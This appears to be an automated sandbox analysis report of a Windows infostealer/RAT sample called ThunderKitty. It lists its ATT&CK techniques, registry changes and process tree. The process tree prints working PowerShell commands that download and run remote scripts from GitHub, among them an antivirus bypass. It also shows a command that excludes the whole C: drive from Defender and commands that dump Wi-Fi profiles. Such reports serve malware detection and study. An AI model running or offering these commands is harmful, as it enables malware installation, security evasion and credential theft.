9e3540f2a70e61ea94d7c79f7b18a242014647693e802d55b0beeca7eee2bcb9

Analysis

max time kernel
136s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/08/2024, 04:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe
Size

14.0MB
MD5

6306c8b9dd7f426c94b26bfe3c8eea0a
SHA1

f2677719e81f9aa8c893552605d077c6462867b8
SHA256

9e3540f2a70e61ea94d7c79f7b18a242014647693e802d55b0beeca7eee2bcb9
SHA512

34689c6c5740d3cb4a73c31b35c7caa0a212f95fc24beae4019a045e28334d8bcb82f9a71c5bb3b5ce147592a4dc9309aedfe82cb8e0221d24256c2809f5674d
SSDEEP

196608:ZjVyhpZ9CKRxcoPqJvAcfYmqQoYiPi9S:Zkh3ZRxcoyJ4cfYmnT

Score

10^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/antivirusbypass.ps1

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 3 IoCs

flow	pid	Process
15	3112	powershell.exe
16	540	powershell.exe
26	3232	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3112	powershell.exe
540	powershell.exe
3232	powershell.exe
516	powershell.exe
3420	PowerShell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4776	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
14	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com
26	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4740	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2640	netsh.exe
4304	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
3656	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4844	ipconfig.exe
3656	NETSTAT.EXE
2792	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2588	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
540	powershell.exe
3420	PowerShell.exe
516	powershell.exe
3112	powershell.exe
3420	PowerShell.exe
540	powershell.exe
516	powershell.exe
3112	powershell.exe
3112	powershell.exe
3112	powershell.exe
3232	powershell.exe
3232	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	540	powershell.exe
Token: SeDebugPrivilege	3420	PowerShell.exe
Token: SeDebugPrivilege	516	powershell.exe
Token: SeDebugPrivilege	3112	powershell.exe
Token: 33	940	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	940	AUDIODG.EXE
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3112	powershell.exe
Token: SeSecurityPrivilege	3112	powershell.exe
Token: SeTakeOwnershipPrivilege	3112	powershell.exe
Token: SeLoadDriverPrivilege	3112	powershell.exe
Token: SeSystemProfilePrivilege	3112	powershell.exe
Token: SeSystemtimePrivilege	3112	powershell.exe
Token: SeProfSingleProcessPrivilege	3112	powershell.exe
Token: SeIncBasePriorityPrivilege	3112	powershell.exe
Token: SeCreatePagefilePrivilege	3112	powershell.exe
Token: SeBackupPrivilege	3112	powershell.exe
Token: SeRestorePrivilege	3112	powershell.exe
Token: SeShutdownPrivilege	3112	powershell.exe
Token: SeDebugPrivilege	3112	powershell.exe
Token: SeSystemEnvironmentPrivilege	3112	powershell.exe
Token: SeRemoteShutdownPrivilege	3112	powershell.exe
Token: SeUndockPrivilege	3112	powershell.exe
Token: SeManageVolumePrivilege	3112	powershell.exe
Token: 33	3112	powershell.exe
Token: 34	3112	powershell.exe
Token: 35	3112	powershell.exe
Token: 36	3112	powershell.exe
Token: SeIncreaseQuotaPrivilege	3112	powershell.exe
Token: SeSecurityPrivilege	3112	powershell.exe
Token: SeTakeOwnershipPrivilege	3112	powershell.exe
Token: SeLoadDriverPrivilege	3112	powershell.exe
Token: SeSystemProfilePrivilege	3112	powershell.exe
Token: SeSystemtimePrivilege	3112	powershell.exe
Token: SeProfSingleProcessPrivilege	3112	powershell.exe
Token: SeIncBasePriorityPrivilege	3112	powershell.exe
Token: SeCreatePagefilePrivilege	3112	powershell.exe
Token: SeBackupPrivilege	3112	powershell.exe
Token: SeRestorePrivilege	3112	powershell.exe
Token: SeShutdownPrivilege	3112	powershell.exe
Token: SeDebugPrivilege	3112	powershell.exe
Token: SeSystemEnvironmentPrivilege	3112	powershell.exe
Token: SeRemoteShutdownPrivilege	3112	powershell.exe
Token: SeUndockPrivilege	3112	powershell.exe
Token: SeManageVolumePrivilege	3112	powershell.exe
Token: 33	3112	powershell.exe
Token: 34	3112	powershell.exe
Token: 35	3112	powershell.exe
Token: 36	3112	powershell.exe
Token: SeIncreaseQuotaPrivilege	3112	powershell.exe
Token: SeSecurityPrivilege	3112	powershell.exe
Token: SeTakeOwnershipPrivilege	3112	powershell.exe
Token: SeLoadDriverPrivilege	3112	powershell.exe
Token: SeSystemProfilePrivilege	3112	powershell.exe
Token: SeSystemtimePrivilege	3112	powershell.exe
Token: SeProfSingleProcessPrivilege	3112	powershell.exe
Token: SeIncBasePriorityPrivilege	3112	powershell.exe
Token: SeCreatePagefilePrivilege	3112	powershell.exe
Token: SeBackupPrivilege	3112	powershell.exe
Token: SeRestorePrivilege	3112	powershell.exe
Token: SeShutdownPrivilege	3112	powershell.exe
Token: SeDebugPrivilege	3112	powershell.exe
Token: SeSystemEnvironmentPrivilege	3112	powershell.exe
Token: SeRemoteShutdownPrivilege	3112	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4908 wrote to memory of 3112	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	85
PID 4908 wrote to memory of 3112	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	85
PID 4908 wrote to memory of 540	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	87
PID 4908 wrote to memory of 540	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	87
PID 4908 wrote to memory of 516	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	88
PID 4908 wrote to memory of 516	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	88
PID 4908 wrote to memory of 3420	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	89
PID 4908 wrote to memory of 3420	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	89
PID 4908 wrote to memory of 1872	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	90
PID 4908 wrote to memory of 1872	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	90
PID 4908 wrote to memory of 2232	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	91
PID 4908 wrote to memory of 2232	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	91
PID 4908 wrote to memory of 3612	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	92
PID 4908 wrote to memory of 3612	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	92
PID 1872 wrote to memory of 4532	1872	cmd.exe	93
PID 1872 wrote to memory of 4532	1872	cmd.exe	93
PID 540 wrote to memory of 4664	540	powershell.exe	94
PID 540 wrote to memory of 4664	540	powershell.exe	94
PID 3112 wrote to memory of 1388	3112	powershell.exe	95
PID 3112 wrote to memory of 1388	3112	powershell.exe	95
PID 4664 wrote to memory of 4116	4664	csc.exe	96
PID 4664 wrote to memory of 4116	4664	csc.exe	96
PID 1388 wrote to memory of 1096	1388	csc.exe	97
PID 1388 wrote to memory of 1096	1388	csc.exe	97
PID 4908 wrote to memory of 2588	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	100
PID 4908 wrote to memory of 2588	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	100
PID 3112 wrote to memory of 2640	3112	powershell.exe	103
PID 3112 wrote to memory of 2640	3112	powershell.exe	103
PID 4908 wrote to memory of 3232	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	105
PID 4908 wrote to memory of 3232	4908	2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe	105
PID 3232 wrote to memory of 1600	3232	powershell.exe	106
PID 3232 wrote to memory of 1600	3232	powershell.exe	106
PID 3112 wrote to memory of 4388	3112	powershell.exe	107
PID 3112 wrote to memory of 4388	3112	powershell.exe	107
PID 4388 wrote to memory of 2500	4388	net.exe	108
PID 4388 wrote to memory of 2500	4388	net.exe	108
PID 1600 wrote to memory of 5100	1600	csc.exe	109
PID 1600 wrote to memory of 5100	1600	csc.exe	109
PID 3112 wrote to memory of 4776	3112	powershell.exe	110
PID 3112 wrote to memory of 4776	3112	powershell.exe	110
PID 3112 wrote to memory of 1168	3112	powershell.exe	111
PID 3112 wrote to memory of 1168	3112	powershell.exe	111
PID 3112 wrote to memory of 2348	3112	powershell.exe	112
PID 3112 wrote to memory of 2348	3112	powershell.exe	112
PID 2348 wrote to memory of 2236	2348	net.exe	113
PID 2348 wrote to memory of 2236	2348	net.exe	113
PID 3112 wrote to memory of 4844	3112	powershell.exe	114
PID 3112 wrote to memory of 4844	3112	powershell.exe	114
PID 3112 wrote to memory of 1520	3112	powershell.exe	115
PID 3112 wrote to memory of 1520	3112	powershell.exe	115
PID 1520 wrote to memory of 1992	1520	net.exe	116
PID 1520 wrote to memory of 1992	1520	net.exe	116
PID 3112 wrote to memory of 3236	3112	powershell.exe	117
PID 3112 wrote to memory of 3236	3112	powershell.exe	117
PID 3112 wrote to memory of 3656	3112	powershell.exe	118
PID 3112 wrote to memory of 3656	3112	powershell.exe	118
PID 3112 wrote to memory of 976	3112	powershell.exe	119
PID 3112 wrote to memory of 976	3112	powershell.exe	119
PID 3112 wrote to memory of 2792	3112	powershell.exe	120
PID 3112 wrote to memory of 2792	3112	powershell.exe	120
PID 3112 wrote to memory of 5016	3112	powershell.exe	121
PID 3112 wrote to memory of 5016	3112	powershell.exe	121
PID 3112 wrote to memory of 4740	3112	powershell.exe	122
PID 3112 wrote to memory of 4740	3112	powershell.exe	122

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3612	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3112
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aqjq0dh4\aqjq0dh4.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1388
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8C1.tmp" "c:\Users\Admin\AppData\Local\Temp\aqjq0dh4\CSC32F7FA706BA342FC8B8A58409BEEC249.TMP"
      4⤵
      PID:1096
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2640
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4388
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2500
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4776
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:1168
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2348
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:2236
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:4844
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:1992
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:3236
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:3656
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:976
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:2792
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:5016
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:4740
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/antivirusbypass.ps1')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:540
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4664
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB882.tmp" "c:\Users\Admin\AppData\Local\Temp\xrr40alp\CSCD9452996B36F4B7B99B5DEF928F07273.TMP"
      4⤵
      PID:4116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:516
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3420
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1872
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:4532
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:2232
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:3612
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
